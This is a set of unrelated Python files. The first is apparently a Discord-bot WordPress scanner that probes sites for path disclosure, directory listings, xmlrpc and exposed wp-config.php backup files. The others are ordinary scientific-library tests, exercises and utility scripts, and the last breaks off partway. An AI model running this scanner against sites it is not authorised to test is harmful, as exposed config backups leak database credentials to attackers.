async def full_path_disclose(message, secret_context, target, user_agent):
r = requests.get(target + "wp-includes/rss-functions.php", headers={"User-Agent": user_agent}, verify=False).text
regex = re.compile("Fatal error:.*? in (.*?) on", re.S)
matches = regex.findall(r)
if matches:
embed = utils.simple_embed('**%s**' % target, 'full path disclose in **%s** exposing: %s'
% (target + "wp-includes/rss-functions.php", matches[0].replace('\n', '')),
discord.Color.green())
await secret_context.discord_client.send_message(message.channel, embed=embed)
async def check_robots(message, secret_context, target, user_agent):
r = requests.get(target + "robots.txt", headers={"User-Agent": user_agent}, verify=False)
if "200" in str(r) and not "404" in r.text:
embed = utils.simple_embed('**%s**' % target, 'robots is available at: **%s**' % target + "robots.txt",
discord.Color.green())
lines = r.text.split('\n')
for l in lines:
if "Disallow:" in l:
embed.add_field(name='disallow', value=l, inline=False)
await secret_context.discord_client.send_message(message.channel, embed=embed)
async def check_directory_listing(message, secret_context, target, user_agent):
directories = ["wp-content/uploads/", "wp-content/plugins/", "wp-content/themes/", "wp-includes/", "wp-admin/"]
dir_name = ["Uploads", "Plugins", "Themes", "Includes", "Admin"]
for directory, name in zip(directories, dir_name):
r = requests.get(target + directory, headers={"User-Agent": user_agent}, verify=False)
if "Index of" in r.text:
embed = utils.simple_embed('**%s**' % target,
'directory listing is enabled for: **%s**' % target + directory,
discord.Color.green())
await secret_context.discord_client.send_message(message.channel, embed=embed)
async def check_xml_rpc(message, secret_context, target, user_agent):
r = requests.get(target + "xmlrpc.php", headers={"User-Agent": user_agent}, verify=False)
if "200" in str(r) and "404" in r.text:
embed = utils.simple_embed('**%s**' % target, 'found xml-rpc interface: **%s**' % target + "xmlrpc.php",
discord.Color.green())
await secret_context.discord_client.send_message(message.channel, embed=embed)
async def check_backup_files(message, secret_context, target, user_agent):
backup = ['wp-config.php~', 'wp-config.php.save', '.wp-config.php.bck', 'wp-config.php.bck', '.wp-config.php.swp',
'wp-config.php.swp', 'wp-config.php.swo', 'wp-config.php_bak', 'wp-config.bak', 'wp-config.php.bak',
'wp-config.save', 'wp-config.old', 'wp-config.php.old', 'wp-config.php.orig', 'wp-config.orig',
'wp-config.php.original', 'wp-config.original', 'wp-config.txt', 'wp-config.php.txt', 'wp-config.backup',
'wp-config.php.backup', 'wp-config.copy', 'wp-config.php.copy', 'wp-config.tmp', 'wp-config.php.tmp',
'wp-config.zip', 'wp-config.php.zip', 'wp-config.db', 'wp-config.php.db', 'wp-config.dat',
'wp-config.php.dat', 'wp-config.tar.gz', 'wp-config.php.tar.gz', 'wp-config.back', 'wp-config.php.back',
'wp-config.test', 'wp-config.php.test']
for b in backup:
r = requests.get(target + b, headers={"User-Agent": user_agent}, verify=False)
if "200" in str(r) and not "404" in r.text:
embed = utils.simple_embed('**%s**' % target, 'found config backup: **%s**' % target + b,
discord.Color.green())
await secret_context.discord_client.send_message(message.channel, embed=embed)
async def check_version(target, user_agent, index):
v = fingerprint_wp_version_meta_based(index)
if v is None:
v = fingerprint_wp_version_feed_based(target, user_agent)
if v is None:
v = fingerprint_wp_version_hash_based(target)
if v is None:
r = requests.get(target + 'readme.html', headers={"User-Agent": user_agent}, verify=False)
if "200" in str(r):
regex = 'Version (.*)'
regex = re.compile(regex)
matches = regex.findall(r.text)
if len(matches) > 0 and matches[0] is not None and matches[0] != "":
return matches[0]
return v
def fingerprint_wp_version_meta_based(index):
regex = re.compile('meta name="generator" content="WordPress (.*?)"')
match = regex.findall(index.text)
if match:
return match[0]
return None
def fingerprint_wp_version_feed_based(target, user_agent):
r = requests.get(target + "index.php/feed", headers={"User-Agent": user_agent}, verify=False).text
regex = re.compile('generator>https://wordpress.org/\?v=(.*?)<\/generator')
match = regex.findall(r)
if match:
return match[0]
return None
def fingerprint_wp_version_hash_based(target):
tree = etree.parse("secret/api/wordpress/wp_versions.xml")
root = tree.getroot()
for i in range(len(root)):
ddl_url = (target + root[i].get('src')).replace('$', '')
ddl_name = "/tmp/" + (root[i].get('src').replace('/', '-'))
utils.download_file(ddl_url, ddl_name)
ddl_hash = utils.md5_hash(ddl_name)
try:
os.remove(ddl_name)
except Exception:
pass
for j in range(len(root[i])):
if "Element" in str(root[i][j]):
if ddl_hash == root[i][j].get('md5'):
return root[i][j][0].text
return None
def get_random_agent():
with open('secret/api/wordpress/user-agents.txt', 'r') as f:
uas = f.read()
uas = re.sub("#.*", "", uas)
uas = uas.replace("\n\n", "")
uas = uas.split('\n')
random = randint(0, len(uas))
return uas[random]
async def update_vuln_db(message, secret_context):
if not os.path.exists('secret/api/wordpress'):
os.mkdir('secret/api/wordpress')
update_url = "https://data.wpscan.org/"
update_files = ['local_vulnerable_files.xml', 'local_vulnerable_files.xsd',
'timthumbs.txt', 'user-agents.txt', 'wp_versions.xml', 'wp_versions.xsd',
'wordpresses.json', 'plugins.json', 'themes.json']
embed = utils.simple_embed('wordpress', 'updating vulnerability database',
discord.Color.green())
await secret_context.discord_client.send_message(message.channel, embed=embed)
for f in update_files:
embed = utils.simple_embed('wordpress', 'downloading %s' % f,
utils.random_color())
await secret_context.discord_client.send_message(message.channel, embed=embed)
utils.download_raw_file(update_url + f, "secret/api/wordpress/" + f)
unzip_file("secret/api/wordpress/user-agents.txt")
unzip_file("secret/api/wordpress/timthumbs.txt")
def unzip_file(filename):
os.system('mv ' + filename + ' ' + filename + ".gz")
os.system('gzip -d ' + filename + ".gz")
def is_lower(str_one, str_two, equal):
sum_one = 0
sum_two = 0
if str_one is None:
if str_two is None:
return False
else:
return True
if str_two is None:
if str_one is None:
return False
else:
return True
if len(str_one) < 5:
str_one += '.0'
if len(str_two) < 5:
str_two += '.0'
str_one = str_one[::-1].split('.')
str_two = str_two[::-1].split('.')
for i in range(len(str_one)):
try:
sum_one += ((i + 1) ** 10) * (int(str_one[i]))
sum_two += ((i + 1) ** 10) * (int(str_two[i]))
except Exception:
return True
if sum_one < sum_two:
return True
if equal and sum_one == sum_two:
return True
return False
|
import numpy as np
import openmc
import pytest
@pytest.fixture(scope='module')
def pincell1(uo2, water):
cyl = openmc.ZCylinder(r=0.35)
fuel = openmc.Cell(fill=uo2, region=-cyl)
moderator = openmc.Cell(fill=water, region=+cyl)
univ = openmc.Universe(cells=[fuel, moderator])
univ.fuel = fuel
univ.moderator = moderator
return univ
@pytest.fixture(scope='module')
def pincell2(uo2, water):
cyl = openmc.ZCylinder(r=0.4)
fuel = openmc.Cell(fill=uo2, region=-cyl)
moderator = openmc.Cell(fill=water, region=+cyl)
univ = openmc.Universe(cells=[fuel, moderator])
univ.fuel = fuel
univ.moderator = moderator
return univ
@pytest.fixture(scope='module')
def zr():
zr = openmc.Material()
zr.add_element('Zr', 1.0)
zr.set_density('g/cm3', 1.0)
return zr
@pytest.fixture(scope='module')
def rlat2(pincell1, pincell2, uo2, water, zr):
"""2D Rectangular lattice for testing."""
all_zr = openmc.Cell(fill=zr)
pitch = 1.2
n = 3
u1, u2 = pincell1, pincell2
lattice = openmc.RectLattice()
lattice.lower_left = (-pitch*n/2, -pitch*n/2)
lattice.pitch = (pitch, pitch)
lattice.outer = openmc.Universe(cells=[all_zr])
lattice.universes = [
[u1, u2, u1],
[u2, u1, u2],
[u2, u1, u1]
]
return lattice
@pytest.fixture(scope='module')
def rlat3(pincell1, pincell2, uo2, water, zr):
"""3D Rectangular lattice for testing."""
# Create another universe for top layer
hydrogen = openmc.Material()
hydrogen.add_element('H', 1.0)
hydrogen.set_density('g/cm3', 0.09)
h_cell = openmc.Cell(fill=hydrogen)
u3 = openmc.Universe(cells=[h_cell])
all_zr = openmc.Cell(fill=zr)
pitch = 1.2
n = 3
u1, u2 = pincell1, pincell2
lattice = openmc.RectLattice()
lattice.lower_left = (-pitch*n/2, -pitch*n/2, -10.0)
lattice.pitch = (pitch, pitch, 10.0)
lattice.outer = openmc.Universe(cells=[all_zr])
lattice.universes = [
[[u1, u2, u1],
[u2, u1, u2],
[u2, u1, u1]],
[[u3, u1, u2],
[u1, u3, u2],
[u2, u1, u1]]
]
return lattice
def test_mesh2d(rlat2):
shape = np.array(rlat2.shape)
width = shape*rlat2.pitch
mesh1 = openmc.RegularMesh.from_rect_lattice(rlat2)
assert np.array_equal(mesh1.dimension, (3, 3))
assert np.array_equal(mesh1.lower_left, rlat2.lower_left)
assert np.array_equal(mesh1.upper_right, rlat2.lower_left + width)
mesh2 = openmc.RegularMesh.from_rect_lattice(rlat2, division=3)
assert np.array_equal(mesh2.dimension, (9, 9))
assert np.array_equal(mesh2.lower_left, rlat2.lower_left)
assert np.array_equal(mesh2.upper_right, rlat2.lower_left + width)
def test_mesh3d(rlat3):
shape = np.array(rlat3.shape)
width = shape*rlat3.pitch
mesh1 = openmc.RegularMesh.from_rect_lattice(rlat3)
assert np.array_equal(mesh1.dimension, (3, 3, 2))
assert np.array_equal(mesh1.lower_left, rlat3.lower_left)
assert np.array_equal(mesh1.upper_right, rlat3.lower_left + width)
mesh2 = openmc.RegularMesh.from_rect_lattice(rlat3, division=3)
assert np.array_equal(mesh2.dimension, (9, 9, 6))
assert np.array_equal(mesh2.lower_left, rlat3.lower_left)
assert np.array_equal(mesh2.upper_right, rlat3.lower_left + width)
|
from unittest import mock
import pytest
from myst_parser.docutils_renderer import SphinxRenderer
@pytest.fixture
def renderer():
renderer = SphinxRenderer()
with renderer:
yield renderer
@pytest.fixture
def sphinx_renderer():
with SphinxRenderer(load_sphinx_env=True) as renderer:
yield renderer
@pytest.fixture
def renderer_mock():
renderer = SphinxRenderer()
renderer.render_inner = mock.Mock(return_value="inner")
with renderer:
yield renderer
|
#!/bin/python3
#
# COMPLETED
#
# PROBLEM:
# http://hr.gs/fnu
import math
import os
import random
import re
import sys
# Complete the twoStrings function below.
def twoStrings(s1, s2):
chars = {}
for char in s1:
chars[char] = 1
for char in s2:
if char in chars: return('YES')
return('NO') |
import numpy as np
import pytest
from chainconsumer import ChainConsumer
def test_gelman_rubin_index():
data = np.vstack((np.random.normal(loc=0.0, size=100000),
np.random.normal(loc=1.0, size=100000))).T
consumer = ChainConsumer()
consumer.add_chain(data, walkers=4)
assert consumer.diagnostic.gelman_rubin(chain=0)
def test_gelman_rubin_index_not_converged():
data = np.vstack((np.random.normal(loc=0.0, size=100000),
np.random.normal(loc=1.0, size=100000))).T
data[80000:, :] *= 2
data[80000:, :] += 1
consumer = ChainConsumer()
consumer.add_chain(data, walkers=4)
assert not consumer.diagnostic.gelman_rubin(chain=0)
def test_gelman_rubin_index_not_converged():
data = np.vstack((np.random.normal(loc=0.0, size=100000),
np.random.normal(loc=1.0, size=100000))).T
data[:, 0] += np.linspace(0, 10, 100000)
consumer = ChainConsumer()
consumer.add_chain(data, walkers=8)
assert not consumer.diagnostic.gelman_rubin(chain=0)
def test_gelman_rubin_index_fails():
data = np.vstack((np.random.normal(loc=0.0, size=100000),
np.random.normal(loc=1.0, size=100000))).T
consumer = ChainConsumer()
consumer.add_chain(data, walkers=4)
with pytest.raises(AssertionError):
consumer.diagnostic.gelman_rubin(chain=10)
def test_gelman_rubin_name():
data = np.vstack((np.random.normal(loc=0.0, size=100000),
np.random.normal(loc=1.0, size=100000))).T
consumer = ChainConsumer()
consumer.add_chain(data, walkers=4, name="testchain")
assert consumer.diagnostic.gelman_rubin(chain="testchain")
def test_gelman_rubin_name_fails():
data = np.vstack((np.random.normal(loc=0.0, size=100000),
np.random.normal(loc=1.0, size=100000))).T
consumer = ChainConsumer()
consumer.add_chain(data, walkers=4, name="testchain")
with pytest.raises(AssertionError):
consumer.diagnostic.gelman_rubin(chain="testchain2")
def test_gelman_rubin_unknown_fails():
data = np.vstack((np.random.normal(loc=0.0, size=100000),
np.random.normal(loc=1.0, size=100000))).T
consumer = ChainConsumer()
consumer.add_chain(data, walkers=4, name="testchain")
with pytest.raises(ValueError):
consumer.diagnostic.gelman_rubin(chain=np.pi)
def test_gelman_rubin_default():
data = np.vstack((np.random.normal(loc=0.0, size=100000),
np.random.normal(loc=1.0, size=100000))).T
consumer = ChainConsumer()
consumer.add_chain(data, walkers=4, name="c1")
consumer.add_chain(data, walkers=4, name="c2")
consumer.add_chain(data, walkers=4, name="c3")
assert consumer.diagnostic.gelman_rubin()
def test_gelman_rubin_default_not_converge():
data = np.vstack((np.random.normal(loc=0.0, size=100000),
np.random.normal(loc=1.0, size=100000))).T
consumer = ChainConsumer()
consumer.add_chain(data, walkers=4, name="c1")
consumer.add_chain(data, walkers=4, name="c2")
data2 = data.copy()
data2[:, 0] += np.linspace(-5, 5, 100000)
consumer.add_chain(data2, walkers=4, name="c3")
assert not consumer.diagnostic.gelman_rubin()
def test_geweke_index():
data = np.vstack((np.random.normal(loc=0.0, size=100000),
np.random.normal(loc=1.0, size=100000))).T
consumer = ChainConsumer()
consumer.add_chain(data, walkers=20, name="c1")
assert consumer.diagnostic.geweke(chain=0)
def test_geweke_index_failed():
data = np.vstack((np.random.normal(loc=0.0, size=100000),
np.random.normal(loc=1.0, size=100000))).T
consumer = ChainConsumer()
data[98000:, :] += 0.5
consumer.add_chain(data, walkers=20, name="c1")
assert not consumer.diagnostic.geweke(chain=0)
def test_geweke_default():
np.random.seed(0)
data = np.vstack((np.random.normal(loc=0.0, size=100000),
np.random.normal(loc=1.0, size=100000))).T
consumer = ChainConsumer()
consumer.add_chain(data, walkers=20, name="c1")
consumer.add_chain(data, walkers=20, name="c2")
assert consumer.diagnostic.geweke(chain=0)
def test_geweke_default_failed():
data = np.vstack((np.random.normal(loc=0.0, size=100000),
np.random.normal(loc=1.0, size=100000))).T
consumer = ChainConsumer()
consumer.add_chain(data, walkers=20, name="c1")
data2 = data.copy()
data2[98000:, :] += 0.3
consumer.add_chain(data2, walkers=20, name="c2")
assert not consumer.diagnostic.geweke() |
fruit = 'banana'
print(len(fruit))
prefixes = 'JKLMNOPQ'
suffix = 'ack'
# for letter in prefixes:
# print(letter + suffix)
fruit = 'banana'
print(fruit[3:]) # 取后3个item
print(fruit[:3]) # 取前3的item
print(fruit[:]) # 取全值
# 计算字母a在字符串中出现的次数:
word = 'banana'
count = 0
for letter in word:
if letter == 'a':
count += 1
print(count)
print(word.upper())
# 下面的函数打印所有既出现在 word1 中,也出现在 word2 中的字母:
def in_both(word1, word2):
for letter in word1:
if letter in word2:
print(letter)
print("-"*100)
in_both('apples', 'oranges')
print("-"*100)
# 术语表
# 对象(object):
# 变量可以引用的东西。现在你将对象和值等价使用。
# 序列(sequence):
# 一个有序的值的集合,每个值通过一个整数索引标识。
# 元素(item):
# 序列中的一个值。
# 索引(index):
# 用来选择序列中元素(如字符串中的字符)的一个整数值。 在Python中,索引从0开始。
# 切片(slice):
# 以索引范围指定的字符串片段。
# 空字符串(empty string):
# 一个没有字符的字符串,长度为0,用两个引号表示。
# 不可变 (immutable):
# 元素不能被改变的序列的性质。
# 遍历(traversal):
# 对一个序列的所有元素进行迭代, 对每一元素执行类似操作。
# 搜索(search):
# 一种遍历模式,当找到搜索目标时就停止。
# 计数器(counter):
# 用来计数的变量,通常初始化为0,并以此递增。
# 方法调用(invocation):
# 执行一个方法的声明.
# 可选参数(optional argument)
# 一个函数或者一个方法中不必要指定的参数。 |
import os
import sys, argparse
import random
parsers = argparse.ArgumentParser()
parsers.add_argument("-i", "--index", help="Please enter begin index")
parsers.add_argument("-f", "--folder", help="Please enter folder path")
args = parsers.parse_args()
def changeFileName(oldName, newName):
os.rename(oldName, newName)
def changeAllFileName(beginIndex, folder):
for file in os.listdir(folder):
changeFileName(folder + '/' + file, folder + '/' + str(beginIndex) + '.gif')
beginIndex = int(beginIndex)+1
def changeAllFileNameSuffer(endIndex, folder):
listIndices = list(range(0, int(endIndex)))
print(listIndices)
random.shuffle(listIndices)
i = 0
for file in os.listdir(folder):
changeFileName(folder + '/' + file, folder + '/' + str(listIndices[i]) + '.gif')
i = i + 1
changeAllFileNameSuffer(args.index, args.folder)
print(args.index)
print(args.folder) |
# coding: utf-8
import unittest
from lxml import etree as ET
from updatepreprint import pipeline_xml
namespaces = {'dc': 'http://purl.org/dc/elements/1.1/',
'xmlns': 'http://www.openarchives.org/OAI/2.0/',
'xsi': 'http://www.w3.org/2001/XMLSchema-instance',
'oai': 'http://www.openarchives.org/OAI/2.0/'}
for namespace_id, namespace_link in namespaces.items():
ET.register_namespace(namespace_id, namespace_link)
class UpdatePrePrintTests(unittest.TestCase):
def setUp(self):
pass
# <field name="id">art-S0102-695X2015000100053-scl</field>
class TestDocumentID(unittest.TestCase):
def test_transform(self):
text = """<root xmlns:dc="http://www.openarchives.org/OAI/2.0/provenance">
<record>
<metadata>
<oai_dc:dc
xmlns:oai_dc="http://www.openarchives.org/OAI/2.0/oai_dc/"
xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://www.openarchives.org/OAI/2.0/oai_dc/
http://www.openarchives.org/OAI/2.0/oai_dc.xsd">
<dc:creator>Trentin,Robson Gonçalves</dc:creator>
<dc:creator>Modolo,Alcir José</dc:creator>
<dc:creator>Vargas,Thiago de Oliveira</dc:creator>
<dc:creator>Campos,José Ricardo da Rocha</dc:creator>
<dc:creator>Adami,Paulo Fernando</dc:creator>
<dc:creator>Baesso,Murilo Mesquita</dc:creator>
<dc:identifier>https://preprints.scielo.org/index.php/scielo/preprint/view/7</dc:identifier>
<dc:identifier>10.1590/scielopreprints.7</dc:identifier>OK
</oai_dc:dc>
</metadata>
</record>
</root>
"""
xml = ET.Element("doc")
raw = ET.fromstring(text)
data = raw, xml
raw, xml = pipeline_xml.DocumentID().transform(data)
self.assertEqual(xml.find(".//field[@name='id']").text, 'preprint_7')
# <field name="ur">art-S1980-993X2015000200234</field>
class TestURL(unittest.TestCase):
def test_transform(self):
text = """<root xmlns:dc="http://www.openarchives.org/OAI/2.0/provenance">
<record>
<metadata>
<oai_dc:dc
xmlns:oai_dc="http://www.openarchives.org/OAI/2.0/oai_dc/"
xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://www.openarchives.org/OAI/2.0/oai_dc/
http://www.openarchives.org/OAI/2.0/oai_dc.xsd">
<dc:identifier>https://preprints.scielo.org/index.php/scielo/preprint/view/7</dc:identifier>
<dc:identifier>10.1590/scielopreprints.7</dc:identifier>OK
</oai_dc:dc>
</metadata>
</record>
</root>
"""
xml = ET.Element("doc")
raw = ET.fromstring(text)
data = raw, xml
raw, xml = pipeline_xml.URL().transform(data)
self.assertEqual(
xml.find(".//field[@name='ur']").text,
"https://preprints.scielo.org/index.php/scielo/preprint/view/7"
)
# <field name="au">Marcelo dos Santos, Targa</field>
class TestAuthors(unittest.TestCase):
def test_transform(self):
text = """<root xmlns:dc="http://www.openarchives.org/OAI/2.0/provenance">
<record>
<metadata>
<oai_dc:dc
xmlns:oai_dc="http://www.openarchives.org/OAI/2.0/oai_dc/"
xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://www.openarchives.org/OAI/2.0/oai_dc/
http://www.openarchives.org/OAI/2.0/oai_dc.xsd">
<dc:creator>Trentin,Robson Gonçalves</dc:creator>
<dc:creator>Modolo,Alcir José</dc:creator>
<dc:creator>Vargas,Thiago de Oliveira</dc:creator>
<dc:creator>Campos,José Ricardo da Rocha</dc:creator>
<dc:creator>Adami,Paulo Fernando</dc:creator>
<dc:creator>Baesso,Murilo Mesquita</dc:creator>
</oai_dc:dc>
</metadata>
</record>
</root>
"""
xml = ET.Element("doc")
raw = ET.fromstring(text)
data = raw, xml
raw, xml = pipeline_xml.Authors().transform(data)
self.assertEqual(
[
"Trentin,Robson Gonçalves",
"Modolo,Alcir José",
"Vargas,Thiago de Oliveira",
"Campos,José Ricardo da Rocha",
"Adami,Paulo Fernando",
"Baesso,Murilo Mesquita",
],
[node.text for node in xml.findall(".//field[@name='au']")]
)
# <field name="ti_*">Benefits and legacy of the water crisis in Brazil</field>
class TestTitles(unittest.TestCase):
def test_transform(self):
text = """<root xmlns:dc="http://www.openarchives.org/OAI/2.0/provenance">
<record>
<metadata>
<oai_dc:dc
xmlns:oai_dc="http://www.openarchives.org/OAI/2.0/oai_dc/"
xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://www.openarchives.org/OAI/2.0/oai_dc/
http://www.openarchives.org/OAI/2.0/oai_dc.xsd">
<dc:title xml:lang="en-US">COVID-19 in Brazil: advantages of a socialized unified health system and preparation to contain cases</dc:title>
<dc:title xml:lang="es-ES">COVID-19 in Brazil: advantages of a socialized unified health system and preparation to contain cases</dc:title>
<dc:title xml:lang="pt-BR">COVID-19 in Brazil: advantages of a socialized unified health system and preparation to contain cases</dc:title>
<dc:title xml:lang="fr-FR">COVID-19 in Brazil: advantages of a socialized unified health system and preparation to contain cases</dc:title>
</oai_dc:dc>
</metadata>
</record>
</root>
"""
xml = ET.Element("doc")
raw = ET.fromstring(text)
data = raw, xml
raw, xml = pipeline_xml.Authors().transform(data)
self.assertIsNone(xml.find(".//field[@name='ti_en']"))
self.assertIsNone(xml.find(".//field[@name='ti_es']"))
self.assertIsNone(xml.find(".//field[@name='ti_pt']"))
self.assertIsNone(xml.find(".//field[@name='ti_fr']"))
# <field name="doi">10.1590/S0102-67202014000200011</field>
class TestDOI(unittest.TestCase):
def test_transform(self):
text = """<root xmlns:dc="http://www.openarchives.org/OAI/2.0/provenance">
<record>
<metadata>
<oai_dc:dc
xmlns:oai_dc="http://www.openarchives.org/OAI/2.0/oai_dc/"
xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://www.openarchives.org/OAI/2.0/oai_dc/
http://www.openarchives.org/OAI/2.0/oai_dc.xsd">
<dc:identifier>https://preprints.scielo.org/index.php/scielo/preprint/view/7</dc:identifier>
<dc:identifier>10.1590/scielopreprints.7</dc:identifier>
</oai_dc:dc>
</metadata>
</record>
</root>
"""
xml = ET.Element("doc")
raw = ET.fromstring(text)
data = raw, xml
raw, xml = pipeline_xml.DOI().transform(data)
self.assertEqual(
xml.find(".//field[@name='doi']").text,
'10.1590/scielopreprints.7')
# <field name="la">en</field>
class TestLanguages(unittest.TestCase):
def test_transform_returns_pt(self):
text = """<root xmlns:dc="http://www.openarchives.org/OAI/2.0/provenance">
<record>
<metadata>
<oai_dc:dc
xmlns:oai_dc="http://www.openarchives.org/OAI/2.0/oai_dc/"
xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://www.openarchives.org/OAI/2.0/oai_dc/
http://www.openarchives.org/OAI/2.0/oai_dc.xsd">
<dc:language>por</dc:language>
</oai_dc:dc>
</metadata>
</record>
</root>
"""
xml = ET.Element("doc")
raw = ET.fromstring(text)
data = raw, xml
raw, xml = pipeline_xml.Languages().transform(data)
self.assertEqual(xml.find(".//field[@name='la']").text, "pt")
def test_transform_returns_en(self):
text = """<root xmlns:dc="http://www.openarchives.org/OAI/2.0/provenance">
<record>
<metadata>
<oai_dc:dc
xmlns:oai_dc="http://www.openarchives.org/OAI/2.0/oai_dc/"
xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://www.openarchives.org/OAI/2.0/oai_dc/
http://www.openarchives.org/OAI/2.0/oai_dc.xsd">
<dc:language>eng</dc:language>
</oai_dc:dc>
</metadata>
</record>
</root>
"""
xml = ET.Element("doc")
raw = ET.fromstring(text)
data = raw, xml
raw, xml = pipeline_xml.Languages().transform(data)
self.assertEqual(xml.find(".//field[@name='la']").text, "en")
def test_transform_returns_es(self):
text = """<root xmlns:dc="http://www.openarchives.org/OAI/2.0/provenance">
<record>
<metadata>
<oai_dc:dc
xmlns:oai_dc="http://www.openarchives.org/OAI/2.0/oai_dc/"
xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://www.openarchives.org/OAI/2.0/oai_dc/
http://www.openarchives.org/OAI/2.0/oai_dc.xsd">
<dc:language>spa</dc:language>
</oai_dc:dc>
</metadata>
</record>
</root>
"""
xml = ET.Element("doc")
raw = ET.fromstring(text)
data = raw, xml
raw, xml = pipeline_xml.Languages().transform(data)
self.assertEqual(xml.find(".//field[@name='la']").text, "es")
# <field name="fulltext_pdf_pt">http://www.scielo.br/pdf/ambiagua/v10n2/1980-993X-ambiagua-10-02-00234.pdf</field>
# <field name="fulltext_pdf_pt">http://www.scielo.br/scielo.php?script=sci_abstract&pid=S0102-67202014000200138&lng=en&nrm=iso&tlng=pt</field>
class TestFulltexts(unittest.TestCase):
def test_transform(self):
text = """<root xmlns:dc="http://www.openarchives.org/OAI/2.0/provenance">
<record>
<metadata>
<oai_dc:dc
xmlns:oai_dc="http://www.openarchives.org/OAI/2.0/oai_dc/"
xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://www.openarchives.org/OAI/2.0/oai_dc/
http://www.openarchives.org/OAI/2.0/oai_dc.xsd">
<dc:identifier>https://preprints.scielo.org/index.php/scielo/preprint/view/7</dc:identifier>
<dc:identifier>10.1590/scielopreprints.7</dc:identifier>
<dc:language>eng</dc:language>
</oai_dc:dc>
</metadata>
</record>
</root>
"""
xml = ET.Element("doc")
raw = ET.fromstring(text)
data = raw, xml
raw, xml = pipeline_xml.Fulltexts().transform(data)
self.assertEqual(
xml.find(".//field[@name='fulltext_html_en']").text,
'https://preprints.scielo.org/index.php/scielo/preprint/view/7')
# <field name="da">2015-06</field>
class TestPublicationDate(unittest.TestCase):
def test_transform(self):
text = """<root xmlns:dc="http://www.openarchives.org/OAI/2.0/provenance">
<record>
<metadata>
<oai_dc:dc
xmlns:oai_dc="http://www.openarchives.org/OAI/2.0/oai_dc/"
xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://www.openarchives.org/OAI/2.0/oai_dc/
http://www.openarchives.org/OAI/2.0/oai_dc.xsd">
<dc:date>2020-03-20</dc:date>
</oai_dc:dc>
</metadata>
</record>
</root>
"""
xml = ET.Element("doc")
raw = ET.fromstring(text)
data = raw, xml
raw, xml = pipeline_xml.PublicationDate().transform(data)
self.assertEqual(xml.find(".//field[@name='da']").text, "2020-03-20")
# <field name="ab_*">In this editorial, we reflect on the benefits and legacy of the water crisis....</field>
class TestAbstract(unittest.TestCase):
def test_transform(self):
text = """<root xmlns:dc="http://www.openarchives.org/OAI/2.0/provenance">
<record>
<metadata>
<oai_dc:dc
xmlns:oai_dc="http://www.openarchives.org/OAI/2.0/oai_dc/"
xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://www.openarchives.org/OAI/2.0/oai_dc/
http://www.openarchives.org/OAI/2.0/oai_dc.xsd">
<dc:description xml:lang="es-ES">COVID-19 in Brazil: advantages of a socialized unified health system and preparation to contain cases</dc:description>
<dc:description xml:lang="pt-BR">COVID-19 in Brazil: advantages of a socialized unified health system and preparation to contain cases</dc:description>
<dc:description xml:lang="fr-FR">COVID-19 in Brazil: advantages of a socialized unified health system and preparation to contain cases</dc:description>
</oai_dc:dc>
</metadata>
</record>
</root>
"""
xml = ET.Element("doc")
raw = ET.fromstring(text)
data = raw, xml
raw, xml = pipeline_xml.Abstract().transform(data)
self.assertIsNotNone(xml.find(".//field[@name='ab_es']"))
self.assertIsNotNone(xml.find(".//field[@name='ab_pt']"))
self.assertIsNotNone(xml.find(".//field[@name='ab_fr']"))
# <field name="AvailableLanguages">en</field>
# <field name="AvailableLanguages">pt</field>
class TestAvailableLanguages(unittest.TestCase):
def test_transform(self):
text = """<root xmlns:dc="http://www.openarchives.org/OAI/2.0/provenance">
<record>
<metadata>
<oai_dc:dc
xmlns:oai_dc="http://www.openarchives.org/OAI/2.0/oai_dc/"
xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://www.openarchives.org/OAI/2.0/oai_dc/
http://www.openarchives.org/OAI/2.0/oai_dc.xsd">
<dc:description xml:lang="es-ES">COVID-19 in Brazil: advantages of a socialized unified health system and preparation to contain cases</dc:description>
<dc:description xml:lang="pt-BR">COVID-19 in Brazil: advantages of a socialized unified health system and preparation to contain cases</dc:description>
<dc:description xml:lang="fr-FR">COVID-19 in Brazil: advantages of a socialized unified health system and preparation to contain cases</dc:description>
</oai_dc:dc>
</metadata>
</record>
</root>
"""
xml = ET.Element("doc")
raw = ET.fromstring(text)
data = raw, xml
raw, xml = pipeline_xml.AvailableLanguages().transform(data)
result = xml.findall('./field[@name="available_languages"]')
self.assertEqual(['es', 'fr', 'pt'], sorted([i.text for i in result]))
# <field name="keyword_*"></field>
class TestKeywords(unittest.TestCase):
def test_transform(self):
text = """<root xmlns:dc="http://www.openarchives.org/OAI/2.0/provenance">
<record>
<metadata>
<oai_dc:dc
xmlns:oai_dc="http://www.openarchives.org/OAI/2.0/oai_dc/"
xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://www.openarchives.org/OAI/2.0/oai_dc/
http://www.openarchives.org/OAI/2.0/oai_dc.xsd">
<dc:subject xml:lang="es-ES">COVID-19 in Brazil: advantages of a socialized unified health system and preparation to contain cases</dc:subject>
